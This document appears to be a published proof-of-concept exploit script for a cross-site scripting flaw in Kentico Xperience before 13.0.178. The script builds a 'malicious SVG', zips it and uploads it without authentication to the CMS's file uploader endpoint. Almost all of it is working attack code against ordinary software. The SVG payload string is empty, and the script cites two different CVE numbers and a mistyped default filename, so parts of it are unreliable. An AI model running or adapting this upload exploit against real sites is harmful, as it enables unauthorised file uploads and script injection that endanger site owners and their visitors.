# Exploit Title: Kentico Xperience 13.0.178 - Cross Site Scripting (XSS) # Date: 2025-05-09 # Version: Kentico Xperience before 13.0.178 # Exploit Author: Alex Messham # Contact: ramessham@gmail.com # Source: https://github.com/xirtam2669/Kentico-Xperience-before-13.0.178---XSS-POC/ # CVE: CVE-2025-32370 import requests import subprocess import os import argparse def create_svg_payload(svg_filename: str): print(f"[*] Writing malicious SVG to: {svg_filename}") svg_payload = ''' ''' with open(svg_filename, 'w') as f: f.write(svg_payload) def zip_payload(svg_filename: str, zip_filename: str): print(f"[*] Creating zip archive: {zip_filename}") subprocess.run(['zip', zip_filename, svg_filename], check=True) def upload_zip(zip_filename: str, target_url: str): full_url = f"{target_url}?Filename={zip_filename}&Complete=false" headers = { "Content-Type": "application/octet-stream" } print(f"[+] Uploading {zip_filename} to {full_url}") with open(zip_filename, 'rb') as f: response = requests.post(full_url, headers=headers, data=f, verify=False) if response.status_code == 200: print("[+] Upload succeeded") else: print(f"[-] Upload failed with status code {response.status_code}") print(response.text) if __name__ == "__main__": parser = argparse.ArgumentParser(description="PoC for CVE-2025-2748 - Unauthenticated ZIP file upload with embedded SVG for XSS.") parser.add_argument("--url", required=True, help="Target upload URL (e.g. https://example.com/CMSModules/.../MultiFileUploader.ashx)") parser.add_argument("--svg", default="poc.svc", help="SVG filename to embed inside the zip") parser.add_argument("--zip", default="exploit.zip", help="Name of the output zip file") args = parser.parse_args() create_svg_payload(args.svg) zip_payload(args.svg, args.zip) upload_zip(args.zip, args.url) ```